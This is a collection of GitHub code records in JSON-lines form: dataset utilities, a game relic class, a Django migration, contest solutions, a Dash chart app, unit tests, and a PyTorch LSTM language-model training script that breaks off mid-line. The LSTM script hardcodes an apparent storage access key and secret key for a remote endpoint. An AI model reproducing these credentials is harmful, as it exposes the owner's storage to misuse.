start_ids[start_pointer]\n start_pointer += 1\n end_pointer += 1\n continue\n if start_id < end_id:\n couple_dict[end_ids[end_pointer]] = start_ids[start_pointer]\n start_pointer += 1\n continue\n if start_id > end_id:\n end_pointer += 1\n continue\n result = [(couple_dict[end], end) for end in couple_dict]\n result = set(result)\n return result\n\n@functional_datapipe(\"set_length\")\nclass LengthSetterIterDataPipe(IterDataPipe):\n r\"\"\"\n Set the length attribute of the DataPipe\n \"\"\"\n\n def __init__(self, source_datapipe: IterDataPipe, length: int) -> None:\n self.source_datapipe: IterDataPipe = source_datapipe\n assert length >= 0\n self.length: int = length\n\n def __iter__(self) -> Iterator:\n yield from self.source_datapipe\n\n def __len__(self) -> int:\n return self.length","repo_name":"rongruosong/uie-lightning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30117251407","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom ...core.objects.hero import DMHero\nfrom ...core.objects.monster import DMMonster\nfrom ...core.objects.relic import DMRelic\nfrom utilities import UnlockPack\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"PhoenixClaw\",)\n\n################################################################################\nclass PhoenixClaw(DMRelic):\n\n def __init__(self, state: DMGame):\n\n super().__init__(\n state,\n _id=\"REL-223\",\n name=\"Phoenix's Claw\",\n description=(\n \"Every time a monster attacks an enemy in Burn state, 2 \"\n \"Acceleration is acquired at a 20 % chance.\"\n ),\n rank=3,\n unlock=UnlockPack.Original\n )\n\n################################################################################\n def handle(self, ctx: AttackContext) -> None:\n \"\"\"Automatically called as part of all battle loops.\"\"\"\n\n # If the attacker is a monster and the defender is a hero...\n if isinstance(ctx.source, DMMonster):\n if isinstance(ctx.target, DMHero):\n # Check if the defender is in Burn state.\n burn = ctx.target.get_status(\"Burn\")\n if burn is not None:\n # If so, roll a 20 % chance to add 2 Acceleration.\n if self.random.chance(20):\n ctx.source.add_status(\"Acceleration\", 2, self)\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/relics/ThreeStar/PhoenixClaw.py","file_name":"PhoenixClaw.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74949345040","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contenttypes', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ],\n options={\n 'verbose_name': 'cliente',\n 'verbose_name_plural': 'clientes',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DeliveryMethod',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('code', models.CharField(verbose_name='código', max_length=50, unique=True)),\n ('name', models.CharField(verbose_name='nombre', max_length=150)),\n ],\n options={\n 'verbose_name': 'método de envío',\n 'verbose_name_plural': 'métodos de envío',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('first_name', models.CharField(verbose_name='nombre', max_length=100)),\n ('last_name', models.CharField(verbose_name='apellido', max_length=100)),\n ('email', models.EmailField(verbose_name='e-mail', max_length=75)),\n ('address', models.TextField(verbose_name='dirección', blank=True)),\n ('phone', models.CharField(verbose_name='teléfono', blank=True, max_length=100)),\n ('object_id', models.PositiveIntegerField()),\n ('content_type', models.ForeignKey(to='contenttypes.ContentType')),\n ],\n options={\n 'verbose_name': 'persona',\n 'verbose_name_plural': 'personas',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='customer',\n name='delivery_method',\n field=models.ForeignKey(verbose_name='método de envio', to='delicontacts.DeliveryMethod'),\n preserve_default=True,\n ),\n ]\n","repo_name":"jualvarez/deliverest","sub_path":"delicontacts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18323339231","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n A = NLI()\n now = 0\n ans = 0\n for a in A:\n if now <= a:\n now = a\n else:\n ans += now - a\n print(ans)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC176/ABC176C.py","file_name":"ABC176C.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37110331427","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport seaborn as sns\nimport pandas as pd\n\n\n\ndef get_fig(df):\n return px.scatter(df, x=\"Lokasyon_Sayisi\", y=\"Cihaz_Sayisi\",\n size=\"Data-Download(GB)\", color='Lokasyon_Kategorisi',\n log_x=True, size_max=60,\n title='Ana Lokasyon Kategorilerinin Alt Bölge Sayısı ve Bağlı Toplam Cihaz Sayısına Göre Download Edilen Data (GB) Miktarı'\n )\n\n\nibb = pd.read_csv('ibb_wifi.csv') # Dataset -> https://data.ibb.gov.tr/dataset/ibbwifi-lokasyon-kategorisine-gore-veri-kullanimi/resource/c80cc8b2-3791-4070-865a-f61296a4cac0\n\nDF = ibb.copy()\n\napp = dash.Dash()\n\nlokasyon_dropdown = dcc.Dropdown(\n id='lokasyon-dropdown',\n options=[\n {'label': f'{lokasyon}', 'value': lokasyon} for lokasyon in DF['Lokasyon_Kategorisi'].unique()\n ],\n searchable=True,\n placeholder='Lokasyon Kategorisi Seçebilirsiniz...',\n)\n\nLAYOUT = html.Div(children=[\n html.H1('Callback Çalışması', style={\n 'textAlign': 'center',\n 'color': 'red',\n }),\n html.Div(children=[\n lokasyon_dropdown,\n dcc.Graph(\n id='scatter-chart',\n figure=get_fig(DF)\n )\n ]),\n])\n\napp.layout = LAYOUT\n\n\n@app.callback(\n dash.dependencies.Output('scatter-chart', 'figure'),\n [dash.dependencies.Input('lokasyon-dropdown', 'value')]\n)\ndef lokasyon_filtrele(value):\n if value:\n return get_fig(DF.query(f'Lokasyon_Kategorisi == \"{value}\"'))\n else:\n return get_fig(DF)\n\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"mebaysan/VeriBilimi","sub_path":"Python/3-)KesifciVeriAnaliziVeVeriGorsellestirme/Plotly-Dash-Examples/intro_callback_ibb.py","file_name":"intro_callback_ibb.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"tr","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"} +{"seq_id":"33990673867","text":"# Это библиотечный пример тестирования стандартных функций для строки\nimport unittest\nfrom fib import fibonacci\n\n# Создается класс. классу соответсвует набор тестовых сценариев (TestCase)(тесируемые кейсы)\nclass TestStringMethods(unittest.TestCase): \n\n def test_simple_fibonacci(self):\n for param, result in [(0, 0), (1, 1), (2, 1), (5, 5)]:\n self.assertEqual(fibonacci(param), result) \n \n def test_stress_fibonacci(self):\n self.assertEqual(fibonacci(9999), fibonacci(9998) + fibonacci(9997)) \n with self.assertRaises(ValueError):\n fibonacci(10000)\n \n def test_negative_fibonacci(self):\n with self.assertRaises(ValueError):\n fibonacci(-1)\n with self.assertRaises(ValueError):\n fibonacci(-100)\n \n def test_wrong_types_fibonacci(self):\n with self.assertRaises(TypeError):\n fibonacci('Hello')\n with self.assertRaises(TypeError):\n fibonacci(3.14) \n \n\n# Тест-кейс 1 (Стандратный пример)\n# def test_upper(self): # Важно что функции начинаются с \"test_\"\n# self.assertEqual('foo'.upper(), 'FOO') # Функция assertEqual предназначена для сравнения двух вещей(равны или не равны)\n\n# def foo(): # Для примера такая функция не вызовется из-за отсутсвия test_\n# pass\n\n# # Тест-кейс 2\n# def test_isupper(self):\n# self.assertTrue('FOO'.isupper()) # Проверяется на правду \n# self.assertFalse('Foo'.isupper()) # Проверяется на не правду\n\n# # Если бы использовался стандартный метод assert - то было бы жесткое падение программы.\n\n# # Тест-кейс 3 \n# def test_split(self):\n# s = 'hello world'\n# self.assertEqual(s.split(), ['hello', 'world'])\n# # check that s.split fails when the separator is not a string\n# with self.assertRaises(TypeError): # Будет вызвано исключение методом assertRaises\n# s.split(2)\n \n\nif __name__ == '__main__':\n unittest.main() # Запускается main из библиотеки unittest","repo_name":"mangustik228/lessons","sub_path":"python/khyrianov/les_14/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25123223294","text":"def oke(n):\n if n < 3:\n print(-1)\n return\n elif n % 3 == 0:\n print('5'*n)\n return\n elif n == 5:\n print('3'*n)\n else:\n flag = False\n for j in range(int(n/3),-1,-1):\n if (n - (3*j))%5 ==0:\n flag = True\n print(\"{}{}\".format('5'*(3*j),'3'*(n - (3*j))))\n break\n if not flag:\n print(-1)\n return\n\nif __name__ == \"__main__\":\n for i in range(int(input())):\n n = int(input())\n oke(n)","repo_name":"hatienl0i261299/HackerRank.com-Code-by-python-ver-3","sub_path":"Sherlock and The Beast.py","file_name":"Sherlock and The Beast.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"42858743065","text":"# read the Diabetes.txt data\nfileHanl = open(\"Diabetes.txt\", \"r\")\ndestFileHanl = open(\"Diabetes.csv\", \"w\")\ndestFileHanl.write(\"g.area,i.area,SSPG,weight,fp.glucose,class\\n\")\nwhile True:\n line = fileHanl.readline()\n if not line:\n break\n vals = line.split(' ')\n finalVals = []\n colsSeen = 0\n for val in vals: \n if val != \"\":\n if colsSeen >= 3:\n finalVals.append(val.strip().replace('\\n',''))\n colsSeen += 1\n \n for i in range(1, len((finalVals))):\n if i == len(finalVals)-1:\n destFileHanl.write(finalVals[i]+\"\\n\")\n else:\n destFileHanl.write(finalVals[i]+\",\")\n\nfileHanl.close()\ndestFileHanl.close()","repo_name":"jeetendragan/statistical-data-mining-ub","sub_path":"HW_3/HW-Final/P2/dataParser.py","file_name":"dataParser.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31459442972","text":"import argparse\nimport time\nimport math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom collections import defaultdict\n\nfrom scipy import signal as signal\nimport data\nimport model_chrono as model\nimport copy\n\nfrom pathlib import Path\nimport sys\npath = Path(__file__).parent.absolute()\nsys.path.append(str(path)+'/cottoncandy')\n\n\nimport os\nos.environ[\"LD_PRELOAD\"]='/home/shivangi/anaconda3/lib/libstdc++.so.6.0.25' \nimport matplotlib.pyplot as plt\n\nfrom utils import batchify, get_batch, repackage_hidden\n\nimport cottoncandy as cc\naccess_key = 'SSE14CR7P0AEZLPC7X0R'\nsecret_key = 'K0MmeXiXotrGIiTeRwEKizkkhR4qFV8tr8cIXprI'\nendpoint_url = 'http://c3-dtn02.corral.tacc.utexas.edu:9002/'\ncci = cc.get_interface('lstm-timescales', ACCESS_KEY=access_key, SECRET_KEY=secret_key,endpoint_url=endpoint_url)\n\nparser = argparse.ArgumentParser(description='PyTorch PennTreeBank RNN/LSTM Language Model')\nparser.add_argument('--data', type=str, default='data/penn/',\n help='location of the data corpus')\nparser.add_argument('--model', type=str, default='LSTM',\n help='type of recurrent net (LSTM, QRNN, GRU)')\nparser.add_argument('--emsize', type=int, default=400,\n help='size of word embeddings')\nparser.add_argument('--nhid', type=int, default=1150,\n help='number of hidden units per layer')\nparser.add_argument('--nlayers', type=int, default=3,\n help='number of layers')\nparser.add_argument('--lr', type=float, default=30,\n help='initial learning rate')\nparser.add_argument('--clip', type=float, default=0.25,\n help='gradient clipping')\nparser.add_argument('--epochs', type=int, default=8000,\n help='upper epoch limit')\nparser.add_argument('--batch_size', type=int, default=80, metavar='N',\n help='batch size')\nparser.add_argument('--bptt', type=int, default=70,\n help='sequence length')\nparser.add_argument('--dropout', type=float, default=0.4,\n help='dropout applied to layers (0 = no dropout)')\nparser.add_argument('--dropouth', type=float, default=0.3,\n help='dropout for rnn layers (0 = no dropout)')\nparser.add_argument('--dropouti', type=float, default=0.65,\n help='dropout for input embedding layers (0 = no dropout)')\nparser.add_argument('--dropoute', type=float, default=0.1,\n help='dropout to remove words from embedding layer (0 = no dropout)')\nparser.add_argument('--wdrop', type=float, default=0.5,\n help='amount of weight dropout to apply to the RNN hidden to hidden matrix')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed')\nparser.add_argument('--nonmono', type=int, default=5,\n help='random seed')\nparser.add_argument('--cuda', action='store_false',\n help='use CUDA')\nparser.add_argument('--log-interval', type=int, default=200, metavar='N',\n help='report interval')\nrandomhash = ''.join(str(time.time()).split('.'))\nparser.add_argument('--save', type=str, default=randomhash+'.pt',\n help='path to save the final model')\nparser.add_argument('--alpha', type=float, default=2,\n help='alpha L2 regularization on RNN activation (alpha = 0 means no regularization)')\nparser.add_argument('--beta', type=float, default=1,\n help='beta slowness regularization applied on RNN activiation (beta = 0 means no regularization)')\nparser.add_argument('--wdecay', type=float, default=1.2e-6,\n help='weight decay applied to all weights')\nparser.add_argument('--resume', type=str, default='',\n help='path of model to resume')\nparser.add_argument('--optimizer', type=str, default='sgd',\n help='optimizer to use (sgd, adam)')\nparser.add_argument('--when', nargs=\"+\", type=int, default=[-1],\n help='When (which epochs) to divide the learning rate by 10 - accepts multiple')\n\n##added by shivi\nparser.add_argument('--Tmax', type=int, default=20)\nparser.add_argument('--Tmin', type=int, default=1)\n\nargs = parser.parse_args()\nargs.tied = True\n\n# Set the random seed manually for reproducibility.\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n else:\n torch.cuda.manual_seed(args.seed)\n\n###############################################################################\n# Load data\n###############################################################################\n\ndef model_save(fn):\n #with open(fn, 'wb') as f:\n # torch.save([model, criterion, optimizer], f)\n cci.upload_pickle('shivangi/'+fn, [model, criterion, optimizer])\n\ndef model_copy_save(fn):\n #with open(fn, 'wb') as f:\n # torch.save([model_copy, criterion, optimizer], f)\n cci.upload_pickle('shivangi/'+fn, [model_copy, criterion, optimizer])\n\ndef model_load(fn):\n global model, criterion, optimizer\n try:\n with open(fn, 'rb') as f:\n model, criterion, optimizer = torch.load(f)\n except:\n print('Downloading from pickle')\n model, criterion, optimizer = cci.download_pickle('shivangi/'+fn)\n\nimport os\nimport hashlib\nfn = 'corpus.{}.data'.format(hashlib.md5(args.data.encode()).hexdigest())\nif os.path.exists(fn):\n print('Loading cached dataset...')\n corpus = torch.load(fn)\nelse:\n print('Producing dataset...')\n corpus = data.Corpus(args.data)\n torch.save(corpus, fn)\n\n####Save word2idx dictionary \nif False:\n word2idx_dict_name = 'shivangi/'+'word2dict_'+ args.data\n word2idx_dict = corpus.dictionary.word2idx\n cci.upload_npy_array(word2idx_dict_name,list(word2idx_dict))\n\n \n #cross_check\n word2dict_penn = cci.download_npy_array(word2idx_dict_name)\n h = {word2dict_penn[i]:i for i in range(len(word2dict_penn))}\n for word in h:\n if word2idx_dict[word] != h[word]:\n print('Worng index')\n\n print(word2idx_dict)\n\n\n####### \n#1. \nvocab_dict = corpus.dictionary.counter\n#print(sorted(vocab_dict.keys(),key=vocab_dict.get,reverse=True))\n#print(vocab_dict)\ntotal_count = sum(vocab_dict.values())\ncount=0\nhigh_freq=set()\nprint( total_count/2)\nfor key in vocab_dict.keys():\n if count < total_count/2:\n count+=vocab_dict[key]\n high_freq.add(key)\n\n####### \neval_batch_size = 10\ntest_batch_size = 1\ntrain_data = batchify(corpus.train, args.batch_size, args)\nval_data = batchify(corpus.valid, eval_batch_size, args)\ntest_data = batchify(corpus.test, test_batch_size, args)\n\n###############################################################################\n# Build the model\n###############################################################################\n\nfrom splitcross import SplitCrossEntropyLoss\ncriterion = None\n\nntokens = len(corpus.dictionary)\nUNK_ind = corpus.dictionary.word2idx['<unk>']\nTmax = args.Tmax; Tmin= args.Tmin\nmodel_copy = model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.dropouth, args.dropouti, args.dropoute, args.wdrop, args.tied, args.Tmax, args.Tmin)\nfor l in range(args.nlayers):\n model_copy.rnns[l]._setweights()\nmodel = model.RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.dropouth, args.dropouti, args.dropoute, args.wdrop, args.tied, args.Tmax, args.Tmin)\n\n###\nif args.resume:\n print('Resuming model ...')\n model_load(args.resume)\n optimizer.param_groups[0]['lr'] = args.lr\n model.dropouti, model.dropouth, model.dropout, args.dropoute = args.dropouti, args.dropouth, args.dropout, args.dropoute\n if args.wdrop:\n from weight_drop import WeightDrop\n for rnn in model.rnns:\n if type(rnn) == WeightDrop: rnn.dropout = args.wdrop\n elif rnn.zoneout > 0: rnn.zoneout = args.wdrop\n###\nif not criterion:\n splits = []\n if ntokens > 500000:\n # One Billion\n # This produces fairly even matrix mults for the buckets:\n # 0: 11723136, 1: 10854630, 2: 11270961, 3: 11219422\n splits = [4200, 35000, 180000]\n elif ntokens > 75000:\n # WikiText-103\n splits = [2800, 20000, 76000]\n print('Using', splits)\n criterion = SplitCrossEntropyLoss(args.emsize, splits=splits, verbose=False)\n###\nif args.cuda:\n model.cuda()\n model_copy.cuda()\n criterion.cuda()\n###\nparams = list(model.parameters()) + list(criterion.parameters())\ntotal_params = sum(x.size()[0] * x.size()[1] if len(x.size()) > 1 else x.size()[0] for x in params if x.size())\nprint('Args:', args)\nprint('Model total parameters:', total_params)\n\n###############################################################################\n# Training code\n###############################################################################\n\ndef evaluate(data_source, batch_size=10):\n # Turn on evaluation mode which disables dropout.\n model.eval()\n #with torch.no_grad():\n if args.model == 'QRNN': model.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(batch_size)\n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n output, hidden = model(data, hidden)\n total_loss += len(data) * criterion(model.decoder.weight, model.decoder.bias, output, targets).data\n hidden = repackage_hidden(hidden)\n return total_loss.item() / len(data_source)\n\ndef evaluate_copy(data_source, batch_size=10):\n # Turn on evaluation mode which disables dropout. \n \n model_copy.eval()\n\n if args.model == 'QRNN': model_copy.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model_copy.init_hidden(batch_size)\n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n output, hidden = model_copy(data, hidden)\n total_loss += len(data) * criterion(model_copy.decoder.weight, model_copy.decoder.bias, output, targets).data\n hidden = repackage_hidden(hidden)\n return total_loss.item() / len(data_source)\n\ndef eval_hig_low_fre(data_source, batch_size=10):\n # Turn on evaluation mode which disables dropout. \n model.eval()\n #with torch.no_grad(): \n \n if args.model == 'QRNN': model.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(batch_size)\n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n output, hidden = model(data, hidden)\n total_loss += len(data) * criterion(model.decoder.weight, model.decoder.bias, output, targets).data\n hidden = repackage_hidden(hidden)\n return total_loss.item() / len(data_source)\n\ndef train():\n # Turn on training mode which enables dropout.\n if args.model == 'QRNN': model.reset()\n total_loss = 0\n start_time = time.time()\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(args.batch_size)\n batch, i = 0, 0\n while i < train_data.size(0) - 1 - 1:\n bptt = args.bptt if np.random.random() < 0.95 else args.bptt / 2.\n # Prevent excessively small or negative sequence lengths\n seq_len = max(5, int(np.random.normal(bptt, 5)))\n # There's a very small chance that it could select a very long sequence length resulting in OOM\n # seq_len = min(seq_len, args.bptt + 10)\n\n lr2 = optimizer.param_groups[0]['lr']\n optimizer.param_groups[0]['lr'] = lr2 * seq_len / args.bptt\n model.train()\n data, targets = get_batch(train_data, i, args, seq_len=seq_len)\n\n # Starting each batch, we detach the hidden state from how it was previously produced.\n # If we didn't, the model would try backpropagating all the way to start of the dataset.\n hidden = repackage_hidden(hidden)\n optimizer.zero_grad()\n\n output, hidden, rnn_hs, dropped_rnn_hs = model(data, hidden, return_h=True)\n raw_loss = criterion(model.decoder.weight, model.decoder.bias, output, targets)\n\n loss = raw_loss\n # Activiation Regularization\n if args.alpha: loss = loss + sum(args.alpha * dropped_rnn_h.pow(2).mean() for dropped_rnn_h in dropped_rnn_hs[-1:])\n # Temporal Activation Regularization (slowness)\n if args.beta: loss = loss + sum(args.beta * (rnn_h[1:] - rnn_h[:-1]).pow(2).mean() for rnn_h in rnn_hs[-1:])\n loss.backward()\n\n # `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.\n if args.clip: torch.nn.utils.clip_grad_norm_(params, args.clip)\n optimizer.step()\n \n # added by shivi to keep reassigning the bias values\n #dict_param = dict(model.named_parameters())\n\n total_loss += raw_loss.data\n optimizer.param_groups[0]['lr'] = lr2\n if batch % args.log_interval == 0 and batch > 0:\n cur_loss = total_loss.item() / args.log_interval\n elapsed = time.time() - start_time\n print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:05.5f} | ms/batch {:5.2f} | '\n 'loss {:5.2f} | ppl {:8.2f} | bpc {:8.3f}'.format(\n epoch, batch, len(train_data) // args.bptt, optimizer.param_groups[0]['lr'],\n elapsed * 1000 / args.log_interval, cur_loss, math.exp(cur_loss), cur_loss / math.log(2)))\n total_loss = 0\n start_time = time.time()\n ###\n batch += 1\n i += seq_len\n #added by shivi\n torch.cuda.empty_cache()\n\n# Loop over epochs.\nlr = args.lr\nbest_val_loss = []\nstored_loss = 100000000\nval_loss_array = []\n## Storing bias values along iterations\nlayer_fb = [ [ ] for l in range(args.nlayers)]\nprint('Should be a list of three empty list', layer_fb)\n# At any point you can hit Ctrl + C to break out of training early.\ntry:\n optimizer = None\n # Ensure the optimizer is optimizing params, which includes both the model's weights as well as the criterion's weight (i.e. Adaptive Softmax)\n if args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(params, lr=args.lr, weight_decay=args.wdecay)\n if args.optimizer == 'adam':\n optimizer = torch.optim.Adam(params, lr=args.lr, weight_decay=args.wdecay)\n for epoch in range(1, args.epochs+1):\n epoch_start_time = time.time()\n train()\n torch.cuda.empty_cache()\n print('Epochs',epoch)\n print('used memory before',torch.cuda.memory_allocated()/1e9)\n print('cached memory beforec',torch.cuda.memory_cached()/1e9)\n \n if 't0' in optimizer.param_groups[0]:\n\n print(\"'\"*89)\n \n l1 = dict(model.named_parameters())\n l2 = dict(model_copy.named_parameters())\n \n for prm_name in l1.keys():\n try: \n l2[prm_name].data = optimizer.state_dict()['state'][id(l1[prm_name])]['ax'] \n except:\n l2[prm_name].data = l1[prm_name].data\n \n \n val_loss2 = evaluate_copy(val_data)\n print('-' * 89)\n print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '\n 'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(\n epoch, (time.time() - epoch_start_time), val_loss2, math.exp(val_loss2), val_loss2 / math.log(2)))\n print('-' * 89)\n val_loss_array.append(val_loss2)\n if val_loss2 < stored_loss:\n model_copy_save(args.save)\n print('Saving Averaged!')\n stored_loss = val_loss2\n \n torch.cuda.empty_cache()\n print('used memory after',torch.cuda.memory_allocated()/1e9)\n print('cached memory after',torch.cuda.memory_cached()/1e9)\n\n else:\n val_loss = evaluate(val_data, eval_batch_size)\n print('-' * 89)\n print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '\n 'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(\n epoch, (time.time() - epoch_start_time), val_loss, math.exp(val_loss), val_loss / math.log(2)))\n print('-' * 89)\n val_loss_array.append(val_loss)\n if val_loss < stored_loss:\n model_save(args.save)\n print('Saving model (new best validation)')\n stored_loss = val_loss\n\n if args.optimizer == 'sgd' and 't0' not in optimizer.param_groups[0] and (len(best_val_loss)>args.nonmono and val_loss > min(best_val_loss[:-args.nonmono])):\n print('Switching to ASGD')\n optimizer = torch.optim.ASGD(model.parameters(), lr=args.lr, t0=0, lambd=0., weight_decay=args.wdecay)\n\n if epoch in args.when:\n print('Saving model before learning rate decreased')\n model_save('{}.e{}'.format(args.save, epoch))\n print('Dividing learning rate by 10')\n optimizer.param_groups[0]['lr'] /= 10.\n\n best_val_loss.append(val_loss)\n\nexcept KeyboardInterrupt:\n print('-=' * 89)\n print('Exiting from training early')\n\nif False: \n \n model_name = args.save.split('.')[0]\n plt.figure();\n plt.plot(val_loss_array);\n plt.axhline(y=stored_loss, color='r', linestyle='-');\n plt.savefig(model_name+'_val_loss_training.png')\n \n model_load(args.save)\n \n # Run on test data. \n test_loss = evaluate(test_data, test_batch_size) \n print('=' * 89) \n print('| End of training | test loss {:5.2f} | test ppl {:8.2f} | test bpc {:8.3f}'.format( \n test_loss, math.exp(test_loss), test_loss / math.log(2))) \n print('=' * 89) \n \n\n dict_param = dict(model.named_parameters()) \n hid_dim = [1150,1150,400] \n \n\n for l in range(3): \n x = (dict_param['rnns.'+str(l)+'.module.bias_ih_l0'].data[0:hid_dim[l]*2].cpu() + dict_param['rnns.'+str(l)+'.module.bias_hh_l0'].data[0:hid_dim[l]*2].cpu()) \n #-----------------------------------------------------------------------------------------------------------------\n #print('Forget gate initialization values for layer',l,'is', math.log( (Tmax/(2**(2-l)))-1))\n print('Expected random values')\n print('Input gates bias after training',x[0:hid_dim[l]])\n \n first_mod = int(0.8*hid_dim[l]); second_mod = int(0.1*hid_dim[l])+first_mod; third_mod = int(0.1*hid_dim[l])+second_mod;\n print('Expected values from ',np.log(1),'to',np.log(19))\n print('Forget gates bias after training',x[hid_dim[l]:hid_dim[l]+first_mod])\n\n print('Expected values',np.log(69))\n print('Forget gates bias after training',x[hid_dim[l]+first_mod:hid_dim[l]+second_mod])\n \n print('Expected values',10**8)\n print('Forget gates bias after training',x[hid_dim[l]+second_mod:hid_dim[l]+third_mod])\n \n #------------------------------------------------------------------------------------------------------------------\n\n plt.figure(); plt.plot(np.sort(x[hid_dim[l]:hid_dim[l]*2])); \n plt.xlabel('Hidden units in sorted order'); plt.ylabel('Forget gate bias values of hidden unit') \n plt.savefig('Custom_fg_bias_modular_layer_'+str(l+1)+str(Tmax)+'.png')\n #------------------------------------------------------------------------------------------------------------------\n\n#exit(0)\n\n#Perform model ablation, remove one word in one position, get the output hidden/cell state , compare with original, write in an array at position index\n \ncos = nn.CosineSimilarity(dim=1, eps=1e-6)\ndiff_arr = np.zeros(71)\ndiff_arr_fl = np.zeros(71)\ndiff_arr_sl = np.zeros(71)\ndiff_arr_tl = np.zeros(71)\nl2norm = nn.PairwiseDistance(p=2)\n\ndef model_ablation(data_source, batch_size=10):\n # Turn on evaluation mode which disables dropout. \n diff_arr = np.zeros(71); diff_arr_fl = np.zeros(71); diff_arr_sl = np.zeros(71); diff_arr_tl = np.zeros(71)\n cell_state_fl = []; cell_state_sl = []; cell_state_tl = []; hidden_store = []\n dist_arr = np.zeros(args.bptt); count = 0\n\n model.eval()\n if args.model == 'QRNN': model.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(args.bptt+1) \n \n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n if data.shape[0] != args.bptt:\n print(data.shape[0])\n continue \n x = data.cpu().detach().numpy()\n y = np.repeat(x,args.bptt+1,axis=1)\n z = np.arange(1,71)\n data_batch_org = torch.tensor(y).cuda()\n \n y[z-1,np.flip(z)] = UNK_ind\n data_batch = torch.tensor(y).cuda()\n \n #print((data_batch))\n #exit(0)\n output, h = model(data_batch, hidden)\n o, hidden = model(data_batch_org, hidden)\n\n first_layer_cell = torch.squeeze(h[0][1],dim=0)\n second_layer_cell= torch.squeeze(h[1][1],dim=0)\n third_layer_cell = torch.squeeze(h[2][1],dim=0)\n \n gt_cs_fl = first_layer_cell[0,:].unsqueeze_(0)\n gt_cs_sl = second_layer_cell[0,:].unsqueeze_(0)\n gt_cs_tl = third_layer_cell[0,:].unsqueeze_(0)\n \n diff_fl = l2norm(first_layer_cell, gt_cs_fl) /torch.norm(gt_cs_fl).item()\n\n if True:\n diff_sl = l2norm(second_layer_cell, gt_cs_sl) / torch.norm(gt_cs_sl).item()\n else: \n first_mod = int(0.8*hid_dim) \n diff_sl = l2norm(second_layer_cell[:first_mod], gt_cs_sl[:first_mod]) / l2norm(gt_cs_sl[:first_mod]) \n diff_sl = l2norm(second_layer_cell[first_mod:], gt_cs_sl[first_mod:]) / l2norm( gt_cs_sl[first_mod:])\n\n #check whether normalized or not\n diff_tl = l2norm(third_layer_cell, gt_cs_tl) / torch.norm(gt_cs_tl).item() \n \n diff_arr_fl += diff_fl.cpu().detach().numpy() \n diff_arr_sl += diff_sl.cpu().detach().numpy()\n diff_arr_tl += 